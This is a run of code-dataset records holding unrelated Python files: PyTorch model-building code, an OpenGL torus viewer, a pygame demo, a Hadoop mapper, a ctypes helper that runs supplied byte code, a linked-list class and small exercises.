seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n # Find queries and keys\n q = self.Q(seq)\n k = self.K(seq)\n \n # Attention\n output = self._calc_self_attention(\n q, \n k, \n seq, \n lengths, \n max_length, \n batch_first=self._batch_first, \n device=device\n )\n\n return output\n\n def _calc_self_attention(self, q, k, v, lengths, max_length, batch_first=False, device=None):\n # The matrix multiplication is always done with using the last two dimensions, i.e. (*, 10, 11).(*, 11, 7) = (*, 10, 7) \n # The transpose means swap second to last and last dimension\n # masked_fill_ is in-place, masked_fill creates a new tensor\n weights = torch.matmul(q, k.transpose(-2, -1)) / sqrt(self.n_out)\n mask = self._get_mask(lengths, max_length, batch_first=batch_first, device=device)\n weights = weights.masked_fill(~mask, float('-inf'))\n weights = self.softmax(weights)\n \n # Calculate weighted sum of v-vectors.\n output = torch.matmul(weights, v)\n \n return output\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(1)\n return mask\n\nclass SoftPlusSigma(nn.Module):\n\n def __init__(self, min_sigma=1e-3):\n super(SoftPlusSigma, self).__init__()\n self._min_sigma = min_sigma\n self._softplus = torch.nn.Softplus()\n \n def forward(self, x, device=None):\n\n # if not device:\n # raise ValueError('A device must be supplied!')\n \n n_features = x.shape[-1]//2\n mean = x[:, :n_features]+0.0\n sigma = self._min_sigma+self._softplus(\n x[:, n_features:]\n )\n out = torch.cat((mean, sigma), dim=-1)\n return out\n\nclass Tanh(nn.Module):\n \n def __init__(self, layer_dict=None):\n \n super(Tanh, self).__init__()\n self._tanh = torch.nn.Tanh()\n self._scale = 1.0 if layer_dict is None else layer_dict['scale']\n \n def forward(self, x, device=None):\n output = self._scale * self._tanh(x/self._scale)\n \n return output\n\n#* ======================================================================== \n#* MODEL FUNCTIONS\n#* ========================================================================\n\ndef add_LSTM_module(arch_dict, layer_dict, modules):\n n_neurons = len(layer_dict['input_sizes'])-1\n \n for i_neurons in range(n_neurons):\n isize = layer_dict['input_sizes'][i_neurons]\n hsize = layer_dict['input_sizes'][i_neurons+1]\n bidir = layer_dict['bidir']\n modules.append(nn.LSTM(input_size=isize, hidden_size=hsize, bidirectional=bidir, batch_first=True))\n return modules\n\ndef add_linear_embedder(arch_dict, layer_dict):\n n_layers = len(layer_dict['input_sizes'])-1\n\n layers = []\n for i_layer in range(n_layers):\n isize = layer_dict['input_sizes'][i_layer]\n hsize = layer_dict['input_sizes'][i_layer+1]\n \n layers.append(ResBlock(arch_dict, layer_dict, ))\n # Add a matrix to linearly \n layers.append(nn.Linear(in_features=isize, out_features=hsize))\n init_weights(arch_dict, arch_dict['nonlin'], layers[-1])\n if layer_dict.get('LayerNorm', False):\n layers.append(nn.LayerNorm(hsize))\n layers.append(add_non_lin(arch_dict, arch_dict['nonlin']))\n \n return nn.Sequential(*layers)\n\ndef add_ResBlock(arch_dict, layer_dict):\n n_ins = layer_dict['input_sizes'][:-1]\n n_outs = layer_dict['input_sizes'][1:]\n\n layers = []\n for n_in, n_out in zip(n_ins, n_outs):\n layers.append(ResBlock(arch_dict, layer_dict, n_in, n_out, layer_dict.get('norm', False)))\n \n return nn.Sequential(*layers)\n\ndef add_linear_layers(arch_dict, layer_dict):\n n_layers = len(layer_dict['input_sizes'])-1\n \n # Add n_layers linear layers with non-linearity and normalization\n layers = []\n for i_layer in range(n_layers):\n isize = layer_dict['input_sizes'][i_layer]\n hsize = layer_dict['input_sizes'][i_layer+1]\n\n # Add layer and initialize its weights\n layers.append(nn.Linear(in_features=isize, out_features=hsize))\n init_weights(arch_dict, arch_dict['nonlin'], layers[-1])\n\n # If last layer, do not add non-linearities or normalization\n if i_layer+1 == n_layers: continue\n\n # If not, add non-linearities and normalization in required order\n else:\n if layer_dict['norm_before_nonlin']:\n\n # Only add normalization layer if wanted!\n if arch_dict['norm']['norm'] != None:\n layers.append(add_norm(arch_dict, arch_dict['norm'], hsize))\n layers.append(add_non_lin(arch_dict, arch_dict['nonlin']))\n\n else:\n layers.append(add_non_lin(arch_dict, arch_dict['nonlin']))\n if arch_dict['norm']['norm'] != None:\n layers.append(add_norm(arch_dict, arch_dict['norm'], hsize))\n\n return nn.Sequential(*layers)\n\ndef add_non_lin(arch_dict, layer_dict):\n if arch_dict['nonlin']['func'] == 'ReLU': \n return nn.ReLU()\n \n elif arch_dict['nonlin']['func'] == 'LeakyReLU':\n negslope = arch_dict['nonlin'].get('negslope', 0.01)\n return nn.LeakyReLU(negative_slope=negslope)\n \n elif arch_dict['nonlin']['func'] == 'Mish':\n return Mish()\n\n else:\n raise ValueError('An unknown nonlinearity could not be added in model generation.')\n\ndef add_norm(arch_dict, layer_dict, n_features):\n \n if layer_dict['norm'] == 'BatchNorm1D':\n \n if 'momentum' in layer_dict: mom = layer_dict['momentum']\n else: mom = 0.1\n\n if 'eps' in layer_dict: eps = layer_dict['eps']\n else: eps = 1e-05\n \n return nn.BatchNorm1d(n_features, eps=eps, momentum=mom)\n \n elif layer_dict['norm'] == 'LayerNorm':\n return nn.LayerNorm(n_features)\n\n else: \n raise ValueError('An unknown normalization could not be added in model generation.')\n\ndef add_AttentionBlock_modules(arch_dict, layer_dict, modules, mode=None):\n\n for n_in, n_out in zip(layer_dict['input_sizes'][:-1], layer_dict['input_sizes'][1:]):\n modules.append(AttentionBlock(arch_dict, layer_dict, n_in, n_out, mode=mode))\n \n return modules\n\ndef add_AttentionBlock2_modules(arch_dict, layer_dict, modules):\n\n for n_in, n_out in zip(layer_dict['input_sizes'][:-1], layer_dict['input_sizes'][1:]):\n modules.append(AttentionBlock2(arch_dict, layer_dict, n_in, n_out))\n \n return modules\n\ndef add_ResAttention_modules(arch_dict, layer_dict, modules):\n\n for n_in, n_out in zip(layer_dict['input_outputs'][:-1], layer_dict['input_outputs'][1:]):\n modules.append(ResAttention(arch_dict, layer_dict, n_in, n_out))\n\n return modules\n\ndef init_weights(arch_dict, layer_dict, layer):\n\n if type(layer) == torch.nn.modules.linear.Linear:\n if layer_dict['func'] == 'ReLU':\n \n nn.init.kaiming_normal_(layer.weight, a=0, mode='fan_in', nonlinearity='relu')\n \n elif layer_dict['func'] == 'LeakyReLU' or layer_dict['func'] == 'Mish':\n\n if 'negative_slope' in layer_dict: \n negslope = layer_dict['negative_slope']\n else: negslope = 0.01\n\n nn.init.kaiming_normal_(layer.weight, a=negslope, mode='fan_in', nonlinearity='leaky_relu')\n \n\n\n else:\n raise ValueError('An unknown initialization was encountered.')\n else:\n raise ValueError('An unknown initialization was encountered.')\n\ndef load_best_model(save_dir):\n \"\"\"Loads and prepares the best model for prediction for a given experiment\n \n Arguments:\n save_dir {str} -- Absolute or relative path to the trained model\n \n Returns:\n torch.nn.Module -- A torch NN.\n \"\"\" \n save_dir = get_project_root() + get_path_from_root(save_dir)\n hyper_pars, data_pars, arch_pars, meta_pars = load_model_pars(save_dir)\n device = get_device(meta_pars['gpu'][0])\n model_dir = save_dir+'/checkpoints'\n best_pars = find_best_model_pars(model_dir)\n n_devices = len(meta_pars['gpu'])\n model = MakeModel(arch_pars, device)\n \n # If several GPU's have been used during training, wrap it in dataparalelle\n if n_devices > 1:\n model = torch.nn.DataParallel(model, device_ids=None, output_device=None, dim=0)\n model.load_state_dict(torch.load(best_pars, map_location=torch.device(device)))\n model = model.to(device)\n model = model.float()\n\n return model\n\ndef find_model_input_vars(save_dir):\n \"\"\"Finds the scalar and sequential features a model requires\n \n Arguments:\n save_dir {str} -- Absolute or relative path to the trained model\n \n Returns:\n list1, list2 -- sequential feature names and scalar feature names.\n \"\"\" \n save_dir = get_project_root() + get_path_from_root(save_dir)\n hyper_pars, data_pars, arch_pars, meta_pars = load_model_pars(save_dir)\n seq_feat = data_pars['seq_feat']\n scalar_feat = data_pars['scalar_feat']\n\n return seq_feat, scalar_feat\n \ndef make_model_architecture(arch_dict):\n\n modules = nn.ModuleList()\n for layer in arch_dict['layers']:\n for key, layer_dict in layer.items():\n \n # has to split, since identical keys would get overwritten in OrderedDict\n # key = name.split('_')[-1]\n\n # Add modules of LSTMs, since we need to iterate over LSTM layers\n if key == 'ResBlock':\n modules.append(add_ResBlock(arch_dict, layer_dict))\n elif key == 'LSTM': \n modules = add_LSTM_module(arch_dict, layer_dict, modules)\n # Add a Sequential layer consisting of a linear block with normalization and nonlinearities\n elif key == 'Linear': \n modules.append(add_linear_layers(arch_dict, layer_dict))\n elif key == 'Conv1d':\n modules.append(add_conv1d(arch_dict, layer_dict))\n elif key == 'Linear_embedder':\n modules.append(add_linear_embedder(arch_dict, layer_dict))\n elif key == 'AttentionEncoder':\n modules = add_AttentionBlock_modules(arch_dict, layer_dict, modules, mode='encoder')\n elif key == 'AttentionDecoder':\n modules = add_AttentionBlock_modules(arch_dict, layer_dict, modules, mode='decoder')\n elif key == 'AttentionBlock2':\n modules = add_AttentionBlock2_modules(arch_dict, layer_dict, modules)\n elif key == 'ManyToOneAttention':\n modules.append(ManyToOneAttention(arch_dict, layer_dict))\n elif key == 'MaxPool':\n modules.append(MaxPool())\n elif key == 'AveragePool':\n modules.append(AveragePool())\n elif key == 'LstmBlock':\n modules.append(LstmBlock(**layer_dict))\n elif key == 'RnnBlock':\n modules.append(RnnBlock(**layer_dict))\n elif key == 'BiLSTM':\n modules.append(BiLSTM(**layer_dict))\n elif key == 'ResAttention':\n modules = add_ResAttention_modules(arch_dict, layer_dict, modules)\n elif key == 'Angle2Unitvector':\n modules.append(Angle2Unitvector())\n elif key == 'SoftPlusSigma':\n modules.append(SoftPlusSigma())\n elif key == 'Tanh':\n modules.append(Tanh(layer_dict))\n else: \n raise ValueError('An unknown module (%s) could not be added in model generation.'%(key))\n\n return modules \n\ndef get_layer_names(arch_dict):\n '''Extracts layer names from an arch_dict\n '''\n layer_names = []\n for layer in arch_dict['layers']:\n for layer_name, dicts in layer.items():\n \n if layer_name == 'AttentionBlock':\n n_attention_modules = len(layer['AttentionBlock']['input_sizes'])-1\n for nth_attention_layer in range(n_attention_modules):\n layer_names.append(layer_name)\n \n elif layer_name == 'AttentionBlock2':\n n_attention_modules = len(layer['AttentionBlock2']['input_sizes'])-1\n for nth_attention_layer in range(n_attention_modules):\n layer_names.append(layer_name)\n \n elif layer_name == 'ResAttention':\n n_attention_modules = len(layer['ResAttention']['input_outputs'])-1\n for nth_attention_layer in range(n_attention_modules):\n layer_names.append(layer_name)\n \n elif layer_name == 'ResBlock':\n if dicts['type'] == 'seq':\n layer_names.append('ResBlockSeq')\n elif dicts['type'] == 'x':\n layer_names.append('ResBlock')\n else:\n raise KeyError('ResBlock: \"type\" MUST be supplied!')\n else:\n layer_names.append(layer_name)\n \n return layer_names\n","sub_path":"src/modules/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":82068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"98800475","text":"#tr0.py \r\n#based on lorenz.py by Stan Blank 22mar05\r\n#OpenGL by Alex Bourd and Matthew Stiak 9oct96\r\n#IrisGL by G Francis 9apr89, last revision 9sep96\r\n# written gkf 6apr05\r\n# there is still a python type error in here but it works as intended.\r\n# but actually, it can't work right this way ! what gives?\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLUT import *\r\nfrom OpenGL.GLU import *\r\nfrom math import *\r\nimport sys\r\n\r\n# Comment out the following two lines if your Python lacks Psyco.\r\nimport psyco\r\npsyco.full()\r\n\r\n# Bryn Keller's version of (cond?expr1:expr2)\r\ndef C(u): return cos(u*0.01745)\r\ndef S(u): return sin(u*0.01745)\r\ndef T(u): return tan(u*0.01745)\r\n\r\n# Need to be declared so functions can assign new values to them\r\nglobal wd\r\nglobal ht\r\nglobal MouseX\r\nglobal MouseY\r\nglobal aff\r\n\r\naff = ([1.0, 0.0, 0.0, 0.0,\r\n 0.0, 1.0, 0.0, 0.0,\r\n 0.0, 0.0, 1.0, 0.0,\r\n 0.0, 0.0, 0.0, 1.0])\r\n \r\ndef drawvert(th,ta):\r\n n0= C(th)*C(ta)\r\n n1= S(th)*C(ta)\r\n n2= S(ta)\r\n\r\n glColor3f(tan(n0*n0), tan(n1*n1), tan(n2*n2))\r\n glVertex3f(n0, n1, n2)\r\n#end drawvert\r\n\r\ndef drawtor():\r\n glBegin(GL_TRIANGLE_STRIP) \r\n for th in range(0,349,12):\r\n for ta in range (0,349, 12): \r\n drawvert(th,ta); drawvert(th+12,ta) \r\n glEnd() \r\n#end drawtor\r\n\r\n#assign initial window and mouse settings\r\nwd = 800\r\nht = 800\r\nMouseX = wd/2\r\nMouseY = ht/2\r\n\r\nbrake = 512. \r\n\r\ndef display():\r\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n glMultMatrixf(aff)\r\n drawtor()\r\n glutSwapBuffers()\r\n#end display()\r\n\r\n#typical keyboard callback \r\ndef keyboard(key, x, y):\r\n if key == chr(27) or key == 'q':\r\n sys.exit(0)\r\n glutPostRedisplay()\r\n#end keyboard()\r\n\r\n#Note that we must declare the globals again\r\ndef chaptrack():\r\n global MouseX\r\n global MouseY\r\n global wd\r\n global ht\r\n global aff\r\n lightPos = (-5.0, 5.0, 5.0, 1.0) \r\n dx = (MouseX-wd/2)/brake \r\n dy = (MouseY-ht/2)/brake\r\n glMatrixMode(GL_MODELVIEW)\r\n glPushMatrix()\r\n glLoadIdentity()\r\n glRotatef(dx,0,1.0,0.0)\r\n glRotatef(dy,1.0,0.0,0.0)\r\n glMultMatrixf(aff)\r\n aff = glGetFloatv(GL_MODELVIEW_MATRIX)\r\n glLightfv(GL_LIGHT0, GL_POSITION, lightPos)\r\n glPopMatrix()\r\n#end chaptrack()\r\n\r\n#traditional idle\r\ndef idle():\r\n chaptrack()\r\n glutPostRedisplay()\r\n#end idle()\r\n\r\n#ditto traditional mousemotion\r\n#Note globals\r\ndef mousemotion(x,y):\r\n global MouseX\r\n global MouseY\r\n MouseX = x\r\n MouseY = y\r\n#end mousemotion()\r\n\r\ndef init():\r\n glEnable(GL_LIGHTING)\r\n glEnable(GL_LIGHT0)\r\n glEnable(GL_COLOR_MATERIAL)\r\n glShadeModel(GL_SMOOTH)\r\n glClearColor(0.0, 0.0, 0.0, 1.0)\r\n\r\n#Traditional main subroutine\r\ndef main() :\r\n global wd\r\n global ht\r\n glutInitDisplayMode(GLUT_RGB | GLUT_DEPTH | GLUT_DOUBLE)\r\n glutInitWindowPosition(50, 50)\r\n glutInitWindowSize(wd, ht)\r\n glutInit([])\r\n glutCreateWindow(\"Octahedron\")\r\n glutKeyboardFunc(keyboard)\r\n glutDisplayFunc(display)\r\n glutIdleFunc(idle)\r\n glutPassiveMotionFunc(mousemotion)\r\n glEnable(GL_DEPTH_TEST)\r\n glShadeModel(GL_SMOOTH)\r\n glMatrixMode(GL_PROJECTION)\r\n glLoadIdentity()\r\n glOrtho(-2.0,2.0,-2.0,2.0,-2.0,2.0)\r\n \r\n init()\r\n glutMainLoop()\r\n\r\n#Necessary if we want to this program to run\r\nmain()\r\n","sub_path":"Python_Programming_in_OpenGL_Blank/withPsycoGeorge.py","file_name":"withPsycoGeorge.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"364416791","text":"import logging\n\nfrom usaspending_api.common.helpers.timing_helpers import timer\nfrom usaspending_api.broker.helpers.delete_stale_fabs import delete_stale_fabs\n\n\nlogger = logging.getLogger(\"console\")\n\n\ndef delete_fabs_transactions(ids_to_delete):\n \"\"\"\n ids_to_delete are afa_generated_unique ids\n \"\"\"\n if ids_to_delete:\n with timer(f\"deleting {len(ids_to_delete)} stale FABS data\", logger.info):\n update_award_ids = delete_stale_fabs(ids_to_delete)\n\n else:\n update_award_ids = []\n logger.info(\"Nothing to delete...\")\n\n return update_award_ids\n","sub_path":"usaspending_api/broker/helpers/delete_fabs_transactions.py","file_name":"delete_fabs_transactions.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502501142","text":"import sys, pygame\nfrom Entity import Entity\nfrom Config import Config\nfrom Graphic import Graphic\nfrom Platform import Platform\npygame.init()\nconfig = Config()\nsize = width, height = config.get_resolution_x(), config.get_resolution_y()\nspeed = [2, 2]\nblack = 0, 0, 0\nred = 255, 0, 0\nblue = 0, 0, 255\n\nscreen = pygame.display.set_mode(size)\n\nplayer = Entity((0, 0), pygame.image.load(\"grass.png\"))\nbackground = Graphic((0, 0), pygame.image.load(\"background.png\"))\n\n\nplatformGroup = [] # Maybe write a class for this\nplatformGroup.append(Platform([50, 50], blue, 200, 10))\n\nplayer.scale_image(50, 50)\ntimer = pygame.time.Clock()\nfpsFont = pygame.font.Font(None, 16)\nwhile 1:\n dx = [0, 0]\n screen.fill(black)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n pygame.event.pump()\n keysPressed = pygame.key.get_pressed()\n if keysPressed[pygame.K_w] or keysPressed[pygame.K_UP]:\n dx[1] += -5\n if keysPressed[pygame.K_s] or keysPressed[pygame.K_DOWN]:\n dx[1] += 5\n if keysPressed[pygame.K_a] or keysPressed[pygame.K_LEFT]:\n dx[0] += -5\n if keysPressed[pygame.K_d] or keysPressed[pygame.K_RIGHT]:\n dx[0] += 5\n background.draw(screen)\n result = False\n for platform in platformGroup:\n if not result:\n result = platform.collide(player.get_rect(), dx, blue)\n platform.draw(screen)\n if result:\n dx = [0, 0]\n player.update(dx)\n player.draw(screen)\n fps_render = fpsFont.render(str(int(timer.get_fps())), 1, red)\n screen.blit(fps_render, [0,0,0,0])\n pygame.display.flip()\n timer.tick(60)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"614572964","text":"# -*- coding: utf-8 -*-\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n#\n# See LICENSE for more details.\n#\n# Copyright (C) 2016-2017 Huawei Inc\nimport ctypes\nimport os\nimport platform\nimport subprocess\nimport sys\n\nPYTHON2 = sys.version_info[0] == 2\nBITS_64 = platform.architecture()[0] == \"64bit\"\nON_WINS = platform.system().lower() == 'windows'\n\n\ndef which(executable, path=None):\n if path is None:\n path = os.environ['PATH']\n paths = path.split(os.pathsep)\n extlist = ['']\n if sys.platform == 'win32':\n pathext = os.environ['PATHEXT'].lower().split(os.pathsep)\n (base, ext) = os.path.splitext(executable)\n if ext.lower() not in pathext:\n extlist = pathext\n for ext in extlist:\n execname = executable + ext\n if os.path.isfile(execname):\n return execname\n else:\n for p in paths:\n f = os.path.join(p, execname)\n if os.path.isfile(f):\n return f\n else:\n return None\n\n\ndef run(command, pipe_command=None):\n if not pipe_command:\n p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output = p1.communicate()[0]\n if not PYTHON2:\n output = output.decode(encoding='UTF-8')\n return p1.returncode, output\n else:\n p1 = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p2 = subprocess.Popen(pipe_command, stdin=p1.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n p1.stdout.close()\n output = p2.communicate()[0]\n if not PYTHON2:\n output = output.decode(encoding='UTF-8')\n return p2.returncode, output\n\n\ndef asm_func(byte_code, restype=None, argtypes=()):\n byte_code = bytes.join(b'', byte_code)\n\n if ON_WINS:\n # Allocate a memory segment the size of the byte code, and make it executable\n size = len(byte_code)\n mem_commit = ctypes.c_ulong(0x1000)\n page_execute_readwrite = ctypes.c_ulong(0x40)\n address = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_size_t(size), mem_commit,\n page_execute_readwrite)\n if not address:\n raise Exception(\"Failed to VirtualAlloc\")\n\n # Copy the byte code into the memory segment\n memmove = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t)(\n ctypes._memmove_addr)\n if memmove(address, byte_code, size) < 0:\n raise Exception(\"Failed to memmove\")\n else:\n # Allocate a memory segment the size of the byte code\n size = len(byte_code)\n address = ctypes.pythonapi.valloc(size)\n if not address:\n raise Exception(\"Failed to valloc\")\n\n # make it writable\n if ctypes.pythonapi.mprotect(address, size, 0x2) < 0:\n raise Exception(\"Failed to mprotect\")\n\n # Copy the byte code into the memory segment\n if ctypes.pythonapi.memmove(address, byte_code, size) < 0:\n raise Exception(\"Failed to memmove\")\n\n # Mark the memory segment as writeable and executable only\n\n # make it writable and executable\n if ctypes.pythonapi.mprotect(address, size, 0x2 | 0x4) < 0:\n raise Exception(\"Failed to mprotect\")\n\n # Cast the memory segment into a function\n functype = ctypes.CFUNCTYPE(restype, *argtypes)\n fun = functype(address)\n return fun, address\n\n\ndef free_func(address, size):\n # Free the function memory segment\n if ON_WINS:\n mem_release = ctypes.c_ulong(0x8000)\n ctypes.windll.kernel32.VirtualFree(address, size, mem_release)\n else:\n # Remove the executable tag on the memory\n if ctypes.pythonapi.mprotect(address, size, 0x1 | 0x2) < 0:\n raise Exception(\"Failed to mprotect\")\n\n ctypes.pythonapi.free(address)\n","sub_path":"library/python/utils/myutils/os.py","file_name":"os.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"39278258","text":"class Ant():\n def __init__(self,size=10):\n self.posit = 0\n self.dir = 1\n self.line = size\n def step(self):\n if self.dir==1:\n if self.posit!=(self.line-1):\n self.posit+=1\n else:\n if self.posit!=0:\n self.posit-=1\n def turn(self):\n if self.dir == 1:\n self.dir = -1\n else:\n self.dir = 1\n def setPos(self,pos):\n if pos>=0 and pos<=(self.line-1):\n self.posit = pos\n def display(self):\n output =\"\"\n for n in range(self.line):\n if n != self.posit:\n output += \".\"\n else:\n if self.dir ==1:\n output+=\">\"\n else:\n output+=\"<\"\n return output\n","sub_path":"csci1133/frisk028_4B.py","file_name":"frisk028_4B.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"161227945","text":"from src.logger import Log\nfrom src.lane_tracker import LaneLinesTracker\nfrom examples import *\n\n\ndef ProcessProjectVideo(subclip_seconds=None):\n Log.section(\"Project Video\")\n\n input_file = \"project_video.mp4\"\n output_file = \"output_videos/project_video.mp4\"\n\n tracker = LaneLinesTracker()\n clip = tracker.process_video(input_file, output_file, subclip_seconds)\n return output_file\n\n\ndef main():\n Log.debug_enabled = False\n # RunCalibrationExample()\n # RunDistortionCorrectionExample()\n # RunEdgeDetectionExample()\n # RunPerspectiveTransformExample()\n # RunLaneFittingExample()\n # RunFullPipelineExample()\n\n ProcessProjectVideo(subclip_seconds=None)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"558442491","text":"def palindromePermutation(word):\n dict={}\n for c in word:\n if (c!=\" \"):\n if (c not in dict):\n dict[c] = 1\n else:\n x = dict[c]\n dict.update({c: x+1})\n counter = 0\n for x in dict:\n incorrect_chars = False\n if dict[x] == 1:\n counter+=1\n elif dict[x]%2==1:\n incorect_chars = True\n word = word.replace(\" \", \"\")\n if ((len(word))%2 == 1 and counter==1 and incorrect_chars == False):\n return True\n elif ((len(word))%2==0 and counter==0 and incorrect_chars == False):\n return True\n else:\n return False\n\ndef main():\n print(palindromePermutation(\"braid\"))\n\nif __name__ == \"__main__\":\n main()","sub_path":"Problem4.py","file_name":"Problem4.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"366696302","text":"import pygame\nimport tileset\n\n\nclass Sprite(pygame.sprite.Sprite):\n def __init__(self, pos, frame):\n super(Sprite, self).__init__()\n SPRITE_CACHE = tileset.TileCache(32, 32)\n images = SPRITE_CACHE.__getitem__('data/tileset.png')\n self.image = pygame.Surface([32, 32])\n self.image = images[frame[0]][frame[1]]\n self.rect = self.image.get_rect()\n self.pos = pos\n self._set_pos(pos)\n\n def _get_pos(self):\n \"\"\"Check the current position of the sprite on the map.\"\"\"\n return (self.rect.topleft[0]/32), (self.rect.topleft[1]/32)\n\n def _set_pos(self, pos):\n \"\"\"Set the position and depth of the sprite on the map.\"\"\"\n self.rect.topleft = (pos[0]*32), (pos[1]*32)\n self.depth = self.rect.midbottom[1]\n\n def move(self, dx, dy):\n \"\"\"Change the position of the sprite on screen.\"\"\"\n self.rect.move_ip(dx, dy)\n self.depth = self.rect.midbottom[1]\n","sub_path":"outpost/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"16605010","text":"# 클래스 정의\nclass BookReader: # 클래스 BookReader 선언\n name = str() # 문자열형 변수 name 선언\n\n def read_book():\n print(name + ' is reading Book!!')\n\n\nreader = BookReader()\nprint(type(reader))\n\nreader.name = 'Twise'\nreader.read_book()","sub_path":"Sect-A/source/sect07_class/temp/s720_def_class.py","file_name":"s720_def_class.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"450393316","text":"import sys\n#\n# >>> Escriba el codigo del mapper a partir de este punto <<<\n#\nimport sys\nif __name__ == \"__main__\":\n for line in sys.stdin:\n key = line.strip()[0]\n date = line.split('\\t')[0].split()[1]\n valor = line.split('\\t')[0].split()[2]\n print(\"{},{},{}\\t\".format(key,date,valor))\n","sub_path":"01-hadoop-50/q07-10/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"371299463","text":"#!/usr/bin/env python\n#\n#\n#\n# @Author: LeShadow\n# @Date: 2013-11-19 10:39:37\n# @Last Modified by: LeShadow\n# @Last Modified time: 2013-11-22 20:15:09\n#\n#\n##################################################\nclass DL_Chain:\n\t'''\n\tImplementation Double linked open chain in python\n\tThis is just a draft, it might be extended in the very near future\n\t'''\t\n\tdef __init__(self):\n\t\t'''\n\t\tConstructor which initializes the list \n\t\tIt also initializes the head and the tail of the DL_Chain\n\t\t'''\t\t\n\t\tself.list = []\n\t\tself.head = None\n\t\tself.tail = None\n\n\tdef insert(self, data):\n\t\t'''\n\t\tIn this function you can add items, this function will also automatically update their next_pointers and prev_pointers to the next and previous item in the chain\n\t\tIf something goes wrong with adding an item, it will return False, else it will return True\n\t\t'''\t\t\n\t\tif len(self.list) == 0:\n\t\t\ttry:\n\t\t\t\tlist_item_data = DL_Node(data, None)\n\t\t\t\tself.head = list_item_data\n\t\t\t\tself.tail = list_item_data\n\t\t\t\tself.list.insert(len(self.list), list_item_data)\n\t\t\t\treturn True\n\t\t\texcept:\n\t\t\t\treturn False\n\t\telse:\n\t\t\ttry:\t\n\t\t\t\tlist_item_data = DL_Node(data, self.list[len(self.list)-1])\n\t\t\t\tself.tail = list_item_data\n\t\t\t\tself.list.insert(len(self.list), list_item_data)\n\t\t\t\treturn True\n\t\t\texcept:\n\t\t\t\treturn False\n\n\tdef remove(self, index):\n\t\t'''\n\t\tIn this function, you can remove a Node, if the given index is out of bounds it will raise an exception\n\t\tThis function will also auto-update the pointers of the other Nodes when one Node is removed.\n\t\t'''\t\t\n\t\tif isinstance(index, int):\n\t\t\tif index > (len(self.list)-1):\n\t\t\t\traise Exception(\"Index is out of bounds\")\n\t\t\telse:\n\t\t\t\tif index == (len(self.list)-1):\n\t\t\t\t\tself.tail = self.list[index-1]\n\t\t\t\t\tself.list.pop(index)\n\t\t\t\t\tself.list[index-1].next_ptr = None\n\t\t\t\t\treturn True\n\t\t\t\telif index == 0:\n\t\t\t\t\tself.head = self.list[1]\n\t\t\t\t\tself.list.pop(index)\n\t\t\t\t\tself.list[0].prev_ptr = None\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\t\n\t\t\t\t\tself.list[index-1].next_ptr = self.list[index].next_ptr\n\t\t\t\t\tself.list[index+1].prev_ptr = self.list[index].prev_ptr\n\t\t\t\t\tself.list.pop(index)\n\t\t\t\t\treturn True\n\n\t\telse:\n\t\t\traise Exception(\"The index has to be of the type integer.\")\n\t\t\treturn False\n\n\t\t\n\n\n\tdef retrieve(self, index):\n\t\t'''\n\t\tIn this function, you can retrieve a Node, if the given index is out of bounds it will raise an exception\n\t\t'''\t\t\t\t\n\t\tif isinstance(index, int):\n\t\t\tif index > (len(self.list)-1) or index < 0:\n\t\t\t\traise Exception(\"Index is out of bounds\")\n\t\t\telse:\n\t\t\t\treturn self.list[index]\n\n\t\telse:\n\t\t\traise Exception(\"The index has to be of the type integer.\")\n\t\t\treturn False\n\n\tdef isEmpty(self):\n\t\t'''\n\t\tThis function will check if the chain is empty or not\n\t\t'''\t\t\n\t\tif len(self.list) == 0:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef getLength(self):\n\t\t'''\n\t\tThis function will return the entire length of the 